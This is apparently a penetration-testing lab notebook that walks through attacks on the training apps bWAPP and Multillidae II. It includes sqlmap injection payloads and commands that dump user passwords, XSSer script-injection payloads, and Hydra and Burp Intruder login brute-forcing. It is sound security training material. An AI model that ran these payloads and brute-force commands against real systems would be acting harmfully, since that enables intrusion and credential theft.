🔬 Passive Crawling with Burp Suite
- Target IP:
192.230.181.3
- Multillidae II
ip -br -c a
eth1@if203734 UP 192.230.181.2/24
nmap -sS -sV 192.230.181.3
- Open the browser and navigate to
http://192.230.181.3/
- Activate
FoxyProxy
Plugin
- Start
BurpSuite
(set User options/Display/Look to Darcula and restart BurpSuite)- Intercept the home page request and turn off the intercept
- Check the
HTTP history
tab - Browse the Multillidae web app and Burp will crawl the visited pages
- Check the
Target
tab for a Site map- Add site to the Scope
SQL Injection - SQLMap
- Target IP:
192.42.186.3
- bWAPP
ip -br -c a
eth1@if178967 UP 192.42.186.2/24
nmap -sS -sV 192.42.186.3
-
Open the browser and navigate to
http://192.42.186.3/
, login withbee
:bug
, selectSQL Injection (GET/Search)
and click Hack button- Input a string and search
http://192.42.186.3/sqli_1.php?title=hacking&action=search
-
Activate
FoxyProxy
Plugin -
Start
BurpSuite
in Interception mode- Refresh the page, intercept the request and copy the cookie
- Cookie:
PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0
- Run
sqlmap
, definingtitle
as the test parameter
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title
---
Parameter: title (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=hacking' AND (SELECT 1664 FROM (SELECT(SLEEP(5)))MSwT) AND 'jFDG'='jFDG&action=search
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=hacking' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a767171,0x7379784e74504d4e76744b6e4c524b4e516a4f4f7878676a51734e6d4c744d547450424844474f76,0x7171707071),NULL,NULL-- -&action=search
---
- In BurpSuite, send the request to Repeater
- Copy the first payload from SQLMap and paste it as part of the
title
parameter
- Copy the first payload from SQLMap and paste it as part of the
hacking' AND (SELECT 1819 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(1819=1819,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'bLrY'='bLrY&action=search
- Use
sqlmap
to get a list of tables for thebWAPP
database
# List databases
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title --dbs
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP --tables
- Use
sqlmap
to get a list of columns in theusers
table of thebWAPP
database
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users --columns
- Dump
password
andemail
for admin from theusers
table
sqlmap -u "http://192.42.186.3/sqli_1.php?title=hacking&action=search" --cookie "PHPSESSID=rmoepg39ac0savq89d1k5fu2q1; security_level=0" -p title -D bWAPP -T users -C admin,password,email --dump
- Turn off Intercept mode in BurpSuite, navigate to
http://192.42.186.3/sqli_6.php
and turn back on Intercept mode.- Search
example
string from the page and intercept it - Copy to file the request and name the filerequest`
- Search
- Use
sqlmap
with this request file
sqlmap -r request -p title
---
Parameter: title (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: title=example' AND (SELECT 9391 FROM(SELECT COUNT(*),CONCAT(0x716a7a7071,(SELECT (ELT(9391=9391,1))),0x7162717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Yvps'='Yvps&action=search
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: title=example' AND (SELECT 6244 FROM (SELECT(SLEEP(5)))dWNC) AND 'Hfwn'='Hfwn&action=search
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: title=example' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7071,0x7463445853774f49666461525a4b446d4a624a706a414976706b56495977444675766767546d6347,0x7162717871),NULL-- -&action=search
---
- In BurpSuite, send the request to Repeater
- Try the proposed payloads from SQLMap
- Change the request to pass
version()
function to the database
XSS Attack - XSSer
- Target IP:
192.131.167.3
- Multillidae II
ip -br -c a
eth1@if178967 UP 192.131.167.2/24
nmap -sS -sV 192.131.167.3
# If Firefox does not start, check the service and kill it
ps -e | grep firefox
<PID>
kill <PID>
- Navigate to the XSS Reflected - DNS Lookup webpage:
http://192.131.167.3/index.php?page=dns-lookup.php
- Enter any text and
Lookup DNS
- The value is reflected back on the web page
- Activate
FoxyProxy
Plugin - Start
BurpSuite
- Enter any text and
Lookup DNS
and intercept the request inBurpSuite
- Copy the payload and input
XSS
in the target_host
- Copy the payload and input
- Use
xsser
to check the vulnerability
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p
'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS'
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p
'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --auto
- Use a custom XSS payload
xsser --url 'http://192.131.167.3/index.php?page=dns-lookup.php' -p 'target_host=XSS&dns-lookup-php-submit-button=Lookup+DNS' --Fp "<script>alert(1)</script>"
- Copy the
Final Attack
payload and use it in the browser or BurpSuite to trigger the XSS attackhttp://192.131.167.3/index.php?page=dns-lookup.php&target_host=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&dns-lookup-php-submit-button=Lookup+DNS
- Perform an XSS Poll Question attack over
GET
requesthttp://192.131.167.3/index.php?page=user-poll.php
- copy the
URL
, replace thenmap
value withXSS
and pass it to XSSerhttp://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=2&user-poll-php-submit-button=Submit+Vote
xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote"
xsser --url "http://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=XSS&initials=2&user-poll-php-submit-button=Submit+Vote" --Fp "<script>alert(1)</script>"
- Open the
Final Attack
link in the browserhttp://192.131.167.3/index.php?page=user-poll.php&csrf-token=&choice=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&initials=2&user-poll-php-submit-button=Submit+Vote
🔬 Authenticated XSS Attack with XSSer
- Target IP:
192.56.179.3
- bWAPP
ip -br -c a
eth1@if178967 UP 192.56.179.2/24
nmap -sS -sV 192.56.179.3
-
Login with
bug
:bee
, select theHTML Injection - Reflected (GET)
bug and input any value. Copy the URLhttp://192.56.179.3/htmli_get.php?firstname=hi&lastname=hi&form=submit
-
Activate
FoxyProxy
Plugin, startBurpSuite
, refresh the webpage and copy theCookie
from the Proxy intercepted requestPHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0
-
Run the
xsser
tool by- replacing the
firstname
value string withXSS
- feeding the Cookie
- stop BurpSuite interceptor
- replacing the
xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0"
xsser --url "http://192.56.179.3/htmli_get.php?firstname=XSS&lastname=hi&form=submit" --cookie="PHPSESSID=lb3rg4q495t9sqph907sdhjgg1; security_level=0" --Fp "<script>alert(1)</script>"
🔬 Attacking HTTP Login Form with Hydra
- Target IP:
192.210.201.3
- bWAPP
ip -br -c a
eth1@if178967 UP 192.210.201.2/24
nmap -sS -sV 192.210.201.3
- Open the
http://192.210.201.3/login.php
page, view source code and check the parameters passed in the login form.
- Prepare a usernames and a passwords list
echo -e "admin\nbee\nuser1\nuser2" > users
cat /root/Desktop/wordlists/100-common-passwords.txt > pws
echo "bug" >> pws
- Use
hydra
to retrieve the credentials
hydra -L users -P pws 192.210.201.3 http-post-form "/login.php:login=^USER^&password=^PASS^&security_level=0&form=submit:Invalid credentials or user not activated!"
🔬 Attacking Basic Auth with Burp Suite
- Target IP:
192.190.241.3
- bWAPP
ip -br -c a
eth1@if178967 UP 192.190.241.2/24
nmap -sS -sV 192.190.241.3
- Open Firefox, activate
FoxyProxy
Plugin, startBurpSuite
, openhttp://192.190.241.3/basic
and intercepted the request. Forward the request, input some data and intercept the request./basic
directory uses Basic Auth- send the request to Intruder
-
Navigate to Intruder - Positions tab
- Decode the
base64
string, it will becometest:test
, like the input data from the login form
- Decode the
- Replace the credentials with a parameter to be substituted like
§credentials§
- In the Payload Options, Load the
/root/Desktop/wordlists/100-common-passwords.txt:
list- In the Payload Processing -
Add prefix
rule, and inputadmin:
to append it to all the passwords- Add a
Encode - Base64-encode
rule too
- Add a
- Start the attack
- In the Payload Processing -
- Check the entry result with status code
301
- Send to Decoder the
Authorization: Basic
value - Check the BurpSuite Decoder tab
- Send to Decoder the
- Decoded as base64 string is
admin:cookie1
- Turn off BurpSuite interceptor, open the web page and insert the found credentials
🚩 The flag is
d25db4ce54b60b49dfd7b32c52ed8d26
🔬 Attacking HTTP Login Form with ZAProxy
- Target IP:
192.145.79.3
- bWAPP
ip -br -c a
eth1@if178967 UP 192.145.79.2/24
nmap -sS -sV 192.145.79.3
- Open the
owasp-zap
tool, Manual Explore, input the URL and launch browserhttp://192.145.79.3
- Attempt login with bad credentials. The website will be added to the sitemap inside
ZAP
- Right click on the
POST
request and select Fuzz...
- Select the input username, click the Add button, Add again and input the payloads for username. Confirm with OK
- Select the input password and do the same thing with a list of possible password
- Start Fuzzer to start the attack and check the results and the
302
response